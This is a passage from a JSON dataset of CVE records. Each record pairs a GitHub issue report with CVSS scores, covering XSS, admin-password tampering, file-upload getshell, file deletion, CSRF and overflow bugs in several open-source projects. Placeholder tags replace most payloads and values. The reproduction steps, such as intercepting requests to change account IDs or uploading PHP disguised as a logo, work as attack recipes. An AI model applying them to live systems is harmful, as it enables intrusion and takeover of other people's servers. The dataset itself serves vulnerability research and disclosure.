directly, And the following values, without XSS filtering, Only the APITAG method is done here, and there is no XSS filtering function in this aspect FILETAG Because there is no filtering here, there is reflective XSS, which is tested as follows Because of the split for / here, the regular XSS payload cannot be taken from a bomb frame, so using the following XSS payload can make a bomb fram APITAG URLTAG FILETAG FILETAG The following test statement can also cause a pop up as normal route=admin/ APITAG FILETAG Solution\uff1a filter or encode special characters like this < > \" ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...",
  56299. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  56300. "severity": "CRITICAL",
  56301. "baseScore": 9.6,
  56302. "impactScore": 6.0,
  56303. "exploitabilityScore": 2.8
  56304. },
  56305. {
  56306. "CVE_ID": "CVE-2020-23719",
  56307. "Issue_Url_old": "https://github.com/xujinliang/zibbs/issues/5",
  56308. "Issue_Url_new": "https://github.com/xujinliang/zibbs/issues/5",
  56309. "Repo_new": "xujinliang/zibbs",
  56310. "Issue_Created_At": "2020-06-23T03:15:15Z",
  56311. "description": "Background setting function APITAG XSS vulnerabilities. First log in to the background and go to the background APITAG the storage XSS vulnerabilities of chicken ribs\uff09 FILETAG Description here\uff08HTML syntax APITAG there is an XSS APITAG the parameter \u3010bbsmeta\u3011here by grabbing the APITAG in the source code PATHTAG code FILETAG This was filtered by APITAG and htmlspecialchar () Obviously when you insert the data into the database you will have a layer of filtering, and then you will continue to track the specific page output location of this parameter to the following PATHTAG code FILETAG When the page is output here, the following function is made for the parameter \u3010bbsmeta\u3011to handle htmlspecialchars_decode The storage XSS here results in the storage XSS due to the use APITAG function, So through the black box to verify Insert the following test statement in the background and click Update payload: APITAG alert(/xss/) APITAG FILETAG The XSS is then accessed directly to the foreground and executed successfully APITAG FILETAG FILETAG Solution\uff1a filter or encode special characters like this < > \" ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...",
  56312. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  56313. "severity": "CRITICAL",
  56314. "baseScore": 9.6,
  56315. "impactScore": 6.0,
  56316. "exploitabilityScore": 2.8
  56317. },
  56318. {
  56319. "CVE_ID": "CVE-2020-23721",
  56320. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/559",
  56321. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/559",
  56322. "Repo_new": "daylightstudio/fuel-cms",
  56323. "Issue_Created_At": "2020-06-23T08:53:30Z",
  56324. "description": "bypass filter XSS vunerability. HI: The attacker bypasses the filter In this pages page! POC: APITAG APITAG APITAG and you can fix it!! thank you",
  56325. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  56326. "severity": "MEDIUM",
  56327. "baseScore": 5.4,
  56328. "impactScore": 2.7,
  56329. "exploitabilityScore": 2.3
  56330. },
  56331. {
  56332. "CVE_ID": "CVE-2020-23722",
  56333. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/560",
  56334. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/560",
  56335. "Repo_new": "daylightstudio/fuel-cms",
  56336. "Issue_Created_At": "2020-06-24T02:12:08Z",
  56337. "description": "General users can modify the administrator password vulnerability. General users can modify the administrator password and account infomation vulnerability . for example: The account test NUMBERTAG can chanage the admin password!!! step NUMBERTAG log in test NUMBERTAG APITAG Step NUMBERTAG edit Any non administrator account\uff1a APITAG APITAG Step NUMBERTAG Save the chanage: APITAG Then Intercept the packets and chanage the \"id\" and \"__fuel_id__\" value NUMBERTAG APITAG APITAG Success : APITAG Step NUMBERTAG log in admin use new password \uff1a APITAG APITAG APITAG",
  56338. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  56339. "severity": "HIGH",
  56340. "baseScore": 8.8,
  56341. "impactScore": 5.9,
  56342. "exploitabilityScore": 2.8
  56343. },
  56344. {
  56345. "CVE_ID": "CVE-2020-23754",
  56346. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2315",
  56347. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2315",
  56348. "Repo_new": "php-fusion/PHP-Fusion",
  56349. "Issue_Created_At": "2020-05-11T10:50:27Z",
  56350. "description": "Cross Site Script Vulnerability on APITAG in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG To Reproduce Steps to reproduce the behavior: Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click add Poll NUMBERTAG Insert Payload // \"> APITAG NUMBERTAG Save Poll: XSS alert Message! Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots Link image APITAG URLTAG Desktop (please complete the following information): OS: Windows Browser: All",
  56351. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  56352. "severity": "CRITICAL",
  56353. "baseScore": 9.6,
  56354. "impactScore": 6.0,
  56355. "exploitabilityScore": 2.8
  56356. },
  56357. {
  56358. "CVE_ID": "CVE-2020-23765",
  56359. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1218",
  56360. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1218",
  56361. "Repo_new": "bludit/bludit",
  56362. "Issue_Created_At": "2020-06-27T17:44:40Z",
  56363. "description": "Bludit NUMBERTAG Admin File Upload vulnerability. Describe your problem A file upload vulnerability was discovered in Bludit NUMBERTAG Hackers need administrator rights. Hacker can use a backup file to control the server. Steps to reproduce the problem NUMBERTAG Download the latest version of bludit from APITAG NUMBERTAG Using burpsuite when uploading logo in the background. Change picture content to PHP code APITAG FILETAG NUMBERTAG Enable backup APITAG and download a backup file, modify the extension of logo file directly in the zip file. If you unzip the backup to modify it, the upload will be blocked by WAF. FILETAG FILETAG FILETAG NUMBERTAG Access _ FILETAG to get the getshell FILETAG Vulnerability in PATHTAG ERRORTAG We can check the image content uploaded by users. Or just delete the backup module Bludit version NUMBERTAG PHP version APITAG",
  56364. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  56365. "severity": "HIGH",
  56366. "baseScore": 7.2,
  56367. "impactScore": 5.9,
  56368. "exploitabilityScore": 1.2
  56369. },
  56370. {
  56371. "CVE_ID": "CVE-2020-23766",
  56372. "Issue_Url_old": "https://github.com/danpros/htmly/issues/412",
  56373. "Issue_Url_new": "https://github.com/danpros/htmly/issues/412",
  56374. "Repo_new": "danpros/htmly",
  56375. "Issue_Created_At": "2020-07-02T21:10:33Z",
  56376. "description": "Arbitrary file deletion vulnerability was found in NUMBERTAG ulnerability description Arbitrary file deletion vulnerability was found in APITAG need administrator rights and they can use any absolute directory to delete any file in the server. Steps to reproduce the problem Using APITAG source code to build the local environment. PHP NUMBERTAG Apache NUMBERTAG Windows NUMBERTAG FILETAG Enter the backup APITAG a backup and delete it. At the same time, use burpsuite to capture the package. FILETAG Enter the absolute path of the file you want to delete here. The relative path is OK FILETAG The file has been deleted. FILETAG I think there's something wrong with the code here. PATHTAG ERRORTAG It does not control the path entered by the user, nor does it detect whether the file belongs to backup",
  56377. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  56378. "severity": "MEDIUM",
  56379. "baseScore": 6.5,
  56380. "impactScore": 5.2,
  56381. "exploitabilityScore": 1.2
  56382. },
  56383. {
  56384. "CVE_ID": "CVE-2020-23768",
  56385. "Issue_Url_old": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/1",
  56386. "Issue_Url_new": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/1",
  56387. "Repo_new": "whiskey-jj/w2s2x2222.github.io",
  56388. "Issue_Created_At": "2020-07-23T05:37:41Z",
  56389. "description": "PHPYUN NUMBERTAG UTF NUMBERTAG Beta has a store XSS vulnerability. Vulnerability description Phpyun is an efficient solution for recruitment and employment of talents and enterprises based on PHP and APITAG database. There is a storage type cross site scripting vulnerability in phpyun. An attacker can exploit the vulnerability to obtain administrator cookies. Recurrence of Vulnerability FILETAG Setting up the environment locally FILETAG Register as a regular user\uff0center APITAG and submit questions Fuzzing finds that most keywords and parentheses are filtered The structure is as follows APITAG APITAG APITAG FILETAG Enter the administrator page FILETAG FILETAG APITAG FILETAG Because the onbounce tag is used, it takes a long time to pop up the APITAG you can see that the code parsed successfully FILETAG This vulnerability has a CNVD number CNVD NUMBERTAG But it will be announced on the official website until NUMBERTAG FILETAG",
  56390. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  56391. "severity": "HIGH",
  56392. "baseScore": 7.5,
  56393. "impactScore": 3.6,
  56394. "exploitabilityScore": 3.9
  56395. },
  56396. {
  56397. "CVE_ID": "CVE-2020-23774",
  56398. "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/2",
  56399. "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/2",
  56400. "Repo_new": "zhonghaozhao/winmail",
  56401. "Issue_Created_At": "2020-06-28T02:42:40Z",
  56402. "description": "Reflected XSS Vulnerability exists in the file of Winmail NUMBERTAG which can cause javascript code executed. Reflected XSS Vulnerability exists in the file of Winmail NUMBERTAG which can cause javascript code executed FILETAG FILETAG FILETAG",
  56403. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56404. "severity": "MEDIUM",
  56405. "baseScore": 6.1,
  56406. "impactScore": 2.7,
  56407. "exploitabilityScore": 2.8
  56408. },
  56409. {
  56410. "CVE_ID": "CVE-2020-23776",
  56411. "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/3",
  56412. "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/3",
  56413. "Repo_new": "zhonghaozhao/winmail",
  56414. "Issue_Created_At": "2020-06-30T09:17:45Z",
  56415. "description": "SSRF Vulnerability exists in the file of Winmail NUMBERTAG when HTTPS is on. SSRF Vulnerability exists in the file of Winmail NUMBERTAG when HTTPS is on The attacker can use this vulnerability to cause the server send the request to the specific url. FILETAG",
  56416. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  56417. "severity": "HIGH",
  56418. "baseScore": 7.5,
  56419. "impactScore": 3.6,
  56420. "exploitabilityScore": 3.9
  56421. },
  56422. {
  56423. "CVE_ID": "CVE-2020-23814",
  56424. "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/1866",
  56425. "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/1866",
  56426. "Repo_new": "xuxueli/xxl-job",
  56427. "Issue_Created_At": "2020-07-30T09:30:54Z",
  56428. "description": "NUMBERTAG Stored XSS vulnerabilities. Locate the executor management function: FILETAG insert POC there has front end validation,By code audit, I find that the back end only has length APITAG be bypassed by Burp Intercept. FILETAG The code directly gets APITAG and manually entered parameters for front end display.No filtering or encoding APITAG storage XSS vulnerabilities. FILETAG The page automatically loads and triggers XSS every NUMBERTAG seconds. FILETAG FILETAG",
  56429. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56430. "severity": "MEDIUM",
  56431. "baseScore": 6.1,
  56432. "impactScore": 2.7,
  56433. "exploitabilityScore": 2.8
  56434. },
  56435. {
  56436. "CVE_ID": "CVE-2020-23836",
  56437. "Issue_Url_old": "https://github.com/siamon123/warehouse-inventory-system/issues/55",
  56438. "Issue_Url_new": "https://github.com/siamon123/warehouse-inventory-system/issues/55",
  56439. "Repo_new": "siamon123/warehouse-inventory-system",
  56440. "Issue_Created_At": "2020-08-10T05:11:52Z",
  56441. "description": "CSRF Change Admin Password. Cross Site Request Forgery (CSRF) on APITAG page allows changing the admin password from a NUMBERTAG rd party site. For fix see: FILETAG",
  56442. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56443. "severity": "HIGH",
  56444. "baseScore": 8.8,
  56445. "impactScore": 5.9,
  56446. "exploitabilityScore": 2.8
  56447. },
  56448. {
  56449. "CVE_ID": "CVE-2020-23839",
  56450. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330",
  56451. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1330",
  56452. "Repo_new": "getsimplecms/getsimplecms",
  56453. "Issue_Created_At": "2020-08-12T20:38:56Z",
  56454. "description": "Reflected Cross Site Scripting (XSS) vulnerability in APITAG CMS NUMBERTAG in APITAG . Reflected Cross Site Scripting (XSS) vulnerability in APITAG CMS NUMBERTAG in APITAG login portal webpage allows remote attackers to execute APITAG code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form.",
  56455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56456. "severity": "MEDIUM",
  56457. "baseScore": 6.1,
  56458. "impactScore": 2.7,
  56459. "exploitabilityScore": 2.8
  56460. },
  56461. {
  56462. "CVE_ID": "CVE-2020-23849",
  56463. "Issue_Url_old": "https://github.com/josdejong/jsoneditor/issues/1029",
  56464. "Issue_Url_new": "https://github.com/josdejong/jsoneditor/issues/1029",
  56465. "Repo_new": "josdejong/jsoneditor",
  56466. "Issue_Created_At": "2020-07-01T03:41:10Z",
  56467. "description": "In tree mode, there exists Stored XSS.. Insert a poc URLTAG FILETAG click the Drop down list box FILETAG click the input tag FILETAG",
  56468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56469. "severity": "MEDIUM",
  56470. "baseScore": 6.1,
  56471. "impactScore": 2.7,
  56472. "exploitabilityScore": 2.8
  56473. },
  56474. {
  56475. "CVE_ID": "CVE-2020-23851",
  56476. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/27",
  56477. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/27",
  56478. "Repo_new": "rockcarry/ffjpeg",
  56479. "Issue_Created_At": "2020-07-02T10:41:13Z",
  56480. "description": "ffjpeg \"jfif_decode\" function stack buffer overflow vulerability. ffjpeg \"jfif_decode\" function stack buffer overflow vulerability Description: There is a stack buffer overflow bug in jfif_decode(void ctxt, BMP pb) function at PATHTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. The bug is caused by the dangerous pointer variable using as follow: x = ((mcui % mcuc) mcuw + h NUMBERTAG jfif >comp_info c].samp_factor_h / sfh_max; y = ((mcui / mcuc) mcuh NUMBERTAG jfif APITAG / sfv_max; idst = yuv_datbuf[c] + y yuv_stride[c] + x; the variable yuv_datbuf is an integer pointer array, but there is no security check before the using of yuv_datbuf (jfif.c: line NUMBERTAG We used APITAG instrumented in ffjpeg and triggered this bug, the output of asan as follow: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff9fa0bfd8 at pc NUMBERTAG f NUMBERTAG f bp NUMBERTAG fff9f READ of size NUMBERTAG at NUMBERTAG fff9fa0bfd8 thread T NUMBERTAG f NUMBERTAG e in jfif_decode PATHTAG NUMBERTAG ed NUMBERTAG in main PATHTAG NUMBERTAG fcbfd NUMBERTAG eb NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG fff9fa0bfd8 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f NUMBERTAG f in jfif_decode PATHTAG This frame has NUMBERTAG object(s NUMBERTAG ftab' (line NUMBERTAG dc' (line NUMBERTAG yuv_stride' (line NUMBERTAG yuv_datbuf' (line NUMBERTAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG f2 f NUMBERTAG f2 f NUMBERTAG f2]f2 f2 f2 f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG f NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING We could clearly observe the stack overflow in jfif_decode function at NUMBERTAG f NUMBERTAG e, and the variable yuv_datbuf was overflowing. Lastly, we used GDB to debug this bug, the GDB outputs: Reading symbols from . APITAG gdb peda$ set args d APITAG gdb peda$ b NUMBERTAG f NUMBERTAG e Breakpoint NUMBERTAG at NUMBERTAG f NUMBERTAG e: file jfif.c, line NUMBERTAG gdb peda$ r Starting program: PATHTAG d APITAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffe NUMBERTAG ffff6e NUMBERTAG APITAG : mov rax,QWORD PTR [rip NUMBERTAG ffff NUMBERTAG f NUMBERTAG APITAG ) RC NUMBERTAG ffffffffbff NUMBERTAG RD NUMBERTAG RSI NUMBERTAG b NUMBERTAG fede NUMBERTAG RDI NUMBERTAG fffffffdff NUMBERTAG b NUMBERTAG APITAG RBP NUMBERTAG fffffffe3d NUMBERTAG fffffffe4c NUMBERTAG ee NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffded NUMBERTAG f NUMBERTAG f ( APITAG : call NUMBERTAG b6cc0 APITAG RIP NUMBERTAG ffffffffcd4b6cc0 R NUMBERTAG fede NUMBERTAG R NUMBERTAG ffffffffc NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG f NUMBERTAG f NUMBERTAG R NUMBERTAG ffffffffc1a NUMBERTAG R NUMBERTAG R NUMBERTAG fb R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero SIGN trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4b6cc0 [ stack NUMBERTAG fffffffded NUMBERTAG f NUMBERTAG f ( APITAG : call NUMBERTAG b6cc0 APITAG NUMBERTAG fffffffdee NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffdee NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffdef NUMBERTAG f NUMBERTAG APITAG : push rbp NUMBERTAG fffffffdef NUMBERTAG fffffffdf NUMBERTAG c NUMBERTAG c NUMBERTAG fffffffdf NUMBERTAG fffffffdf NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4b6cc0 in ?? () We ensured there is a stack overflow bugs, which will be used to finish a APITAG attack. You can reproduce this stack overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG",
  56481. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56482. "severity": "MEDIUM",
  56483. "baseScore": 5.5,
  56484. "impactScore": 3.6,
  56485. "exploitabilityScore": 1.8
  56486. },
  56487. {
  56488. "CVE_ID": "CVE-2020-23852",
  56489. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/28",
  56490. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/28",
  56491. "Repo_new": "rockcarry/ffjpeg",
  56492. "Issue_Created_At": "2020-07-02T11:43:44Z",
  56493. "description": "ffjpeg \"jfif_decode\" function heap overflow vulnerabilities. ffjpeg \"jfif_decode\" function heap overflow vulnerabilities Description: There are two heap overflow bugs in jfif_decode(void ctxt, BMP pb) function at PATHTAG line NUMBERTAG line NUMBERTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. We finded the integer pointer array variable yuv_datbuf FILETAG Lastly, we used GDB to debug this bug, the GDB outputs: gdb peda$ b NUMBERTAG f2f NUMBERTAG Breakpoint NUMBERTAG at NUMBERTAG f2f NUMBERTAG gdb peda$ r Starting program: PATHTAG d hh Thread debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffdd NUMBERTAG a6e NUMBERTAG interceptor_free(void NUMBERTAG test r NUMBERTAG d,r NUMBERTAG d) RC NUMBERTAG ffffff NUMBERTAG RD NUMBERTAG c NUMBERTAG RSI NUMBERTAG ffffefcb NUMBERTAG RDI NUMBERTAG be RBP NUMBERTAG fffffffe3f NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffda NUMBERTAG f2f0a ( APITAG : mov rax,QWORD PTR [rb NUMBERTAG RIP NUMBERTAG ffffffffcd4b4f NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffffd1c NUMBERTAG a NUMBERTAG a1 APITAG test r NUMBERTAG d,r NUMBERTAG d) R NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG dd NUMBERTAG dc NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b NUMBERTAG f1f1f1f NUMBERTAG R NUMBERTAG dd NUMBERTAG dc NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4b4f NUMBERTAG stack NUMBERTAG fffffffda NUMBERTAG f2f0a ( APITAG : mov rax,QWORD PTR [rb NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffda NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_height NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : push rbp NUMBERTAG fffffffda NUMBERTAG a NUMBERTAG fffffffdaa NUMBERTAG c NUMBERTAG fffffffdaa NUMBERTAG fffffffdab NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4b4f NUMBERTAG in ?? () We ensured there is a heap overflow because of the dangerous using of the int pointer array variable yuv_datbuf This is the analysis of line NUMBERTAG and the analysis of line NUMBERTAG is similar, so we do not dump the detail analysis. You can reproduce this heap overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG ffjpeg d APITAG URLTAG",
  56494. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56495. "severity": "MEDIUM",
  56496. "baseScore": 5.5,
  56497. "impactScore": 3.6,
  56498. "exploitabilityScore": 1.8
  56499. },
  56500. {
  56501. "CVE_ID": "CVE-2020-23861",
  56502. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/248",
  56503. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/248",
  56504. "Repo_new": "libredwg/libredwg",
  56505. "Issue_Created_At": "2020-07-18T12:19:50Z",
  56506. "description": "APITAG \"read_system_page\" function heap overflow vulnerability. APITAG \"read_system_page\" function heap overflow vulnerability Description: There is a heap overflow function bug in \"read_system_page\" function at PATHTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a dwg file. This bug is caused by the following dangerous memcpy calling in read_system_page function: line NUMBERTAG if\u00a0(size_comp\u00a0 APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Then, we used GDB to debug this bug, the GDB outputs: GDB [ registers ] RA NUMBERTAG ffff2c6a1e NUMBERTAG ffff6fed NUMBERTAG APITAG : dec DWORD PTR [rcx+rc NUMBERTAG RB NUMBERTAG f RC NUMBERTAG RD NUMBERTAG CODETAG ') R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rdi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rsi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rdx,r NUMBERTAG ffff6fed NUMBERTAG a APITAG : call NUMBERTAG ffff6be NUMBERTAG APITAG NUMBERTAG ffff6fed NUMBERTAG f APITAG : mov rdi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : call NUMBERTAG ffff6be NUMBERTAG e0 APITAG NUMBERTAG ffff6fed NUMBERTAG APITAG : jmp NUMBERTAG ffff6fed NUMBERTAG a APITAG NUMBERTAG ffff6fed NUMBERTAG APITAG : lea rdi,[rip NUMBERTAG d9a NUMBERTAG c NUMBERTAG ffff7d NUMBERTAG c Guessed arguments: arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG CODETAG NUMBERTAG fffffffc NUMBERTAG ffffffffffffff NUMBERTAG fffffffc NUMBERTAG fffffffcc NUMBERTAG f [ ] Legend: code, data, rodata, value NUMBERTAG ffff6fed NUMBERTAG a NUMBERTAG memcpy (data, pedata, size_uncomp); gdb peda$ APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e7e NUMBERTAG bp NUMBERTAG fffffffc NUMBERTAG sp NUMBERTAG fffffffbbb0 READ of size NUMBERTAG at NUMBERTAG thread T0 APITAG process NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG process NUMBERTAG is executing new program: PATHTAG Error in re setting breakpoint NUMBERTAG No symbol table is loaded. Use the \"file\" command. Warning: Cannot insert breakpoint NUMBERTAG Cannot access memory at address NUMBERTAG c NUMBERTAG We ensured there is a heap overflow vulnerability because of the dangerous using of memcpy function, attacker can use this bug to finish a APITAG attack. You can reproduce this heap overflow vulnerability by the follow step: /dwg2dxf m b APITAG URLTAG",
  56507. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56508. "severity": "MEDIUM",
  56509. "baseScore": 5.5,
  56510. "impactScore": 3.6,
  56511. "exploitabilityScore": 1.8
  56512. },
  56513. {
  56514. "CVE_ID": "CVE-2020-23872",
  56515. "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/10",
  56516. "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/10",
  56517. "Repo_new": "kermitt2/pdf2xml",
  56518. "Issue_Created_At": "2020-07-06T01:52:41Z",
  56519. "description": "NULL pointer dereference APITAG APITAG $ gdb ./pdf2xml (gdb) r NUMBERTAG NULL pointer dereference APITAG APITAG FILETAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG e NUMBERTAG b in APITAG (state NUMBERTAG a NUMBERTAG a0, this NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG APITAG = APITAG (gdb) bt NUMBERTAG e NUMBERTAG b in APITAG (state NUMBERTAG a NUMBERTAG a0, this NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG APITAG (this=<optimized out>, state NUMBERTAG a NUMBERTAG a0) at PATHTAG NUMBERTAG b in APITAG (this=this APITAG cmd=cmd APITAG APITAG APITAG at PATHTAG NUMBERTAG a4f in Gfx::go (this=this APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in Gfx::display (this=this APITAG APITAG APITAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG a NUMBERTAG f0, out NUMBERTAG eae0, out APITAG hDPI NUMBERTAG hDPI APITAG vDPI NUMBERTAG APITAG NUMBERTAG rotate=<optimized out>, rotate APITAG APITAG crop=crop APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG af in Page::display (this=<optimized out>, out=out APITAG APITAG APITAG NUMBERTAG rotate=rotate APITAG APITAG crop=crop APITAG printing=printing APITAG APITAG APITAG at PATHTAG NUMBERTAG ffb in APITAG (this=this APITAG out NUMBERTAG out APITAG page=page APITAG hDPI NUMBERTAG hDPI APITAG APITAG NUMBERTAG DPI APITAG rotate NUMBERTAG rotate APITAG APITAG crop=crop APITAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG e in APITAG (this=this APITAG out=out APITAG APITAG APITAG APITAG APITAG rotate=rotate APITAG APITAG crop NUMBERTAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG b in APITAG (this=this APITAG out=out APITAG APITAG APITAG APITAG APITAG APITAG rotate=rotate APITAG APITAG crop NUMBERTAG APITAG APITAG APITAG at PATHTAG NUMBERTAG in main (argc NUMBERTAG argv=<optimized out>) at 